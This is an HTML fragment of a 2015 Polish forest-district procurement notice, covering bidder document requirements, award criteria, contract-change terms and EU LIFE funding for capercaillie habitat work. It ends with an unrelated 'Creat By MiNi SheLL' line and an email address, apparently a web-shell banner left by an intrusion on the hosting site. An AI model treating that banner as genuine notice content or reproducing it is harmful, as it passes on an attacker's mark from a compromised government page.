</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin wykonania zadań związanych z przygotowaniem powierzchni - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron w formie aneksu 
    do umowy, pod rygorem nieważności takiej zmiany. 
2. Zamawiający przewiduje możliwość zmian postanowień umowy w stosunku do treści oferty, 
    na podstawie której dokonano wyboru Wykonawcy, w przypadku:
    1) konieczności zmiany terminu wykonania przedmiotu zamówienia na skutek wystąpienia
        warunków atmosferycznych uniemożliwiających wykonanie przedmiotu zamówienia 
        w ustalonym terminie;
    2) konieczności wykonania robót dodatkowych.
3. Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego i podpisanego przez
    przedstawicieli Zamawiającego oraz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_wroclaw/nadl_ruszow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2015 godzina 12:00, miejsce: Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów
Sekretariat - pokój Nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie prowadzone w ramach projektu LIFE11 NAT/PL/428 Czynna ochrona nizinnych populacji głuszca (Tetrao urogallus L.) na terenie Borów Dolnośląskich i Puszczy Augustowskiej (Active protection of lowlandpopulations of Capercaillie in the Bory Dolnośląskie Forest and Augustowska PrimevalForest) - oznaczonego dla potrzeb Instrumentu Finansowego dla Środowiska LIFE+ nr LIFE 11NAT/PL/428oraz wykorzystania i rozliczenia dotacji ze środków Wspólnoty Europejskiej, udzielonej na podstawie stosownej umowy o nr LIFE 11NAT/PL/428 oraz ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej, udzielonej na podstawie umowy o nr 716/2012/Wn50/OP-RE-LF/D oraz ze środków Państwowego Gospodarstwa Leśnego Lasy Państwowe (część działania C.1 - Przygotowanie powierzchni adaptacyjnych i obozowisk w Borach Dolnośląskich)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com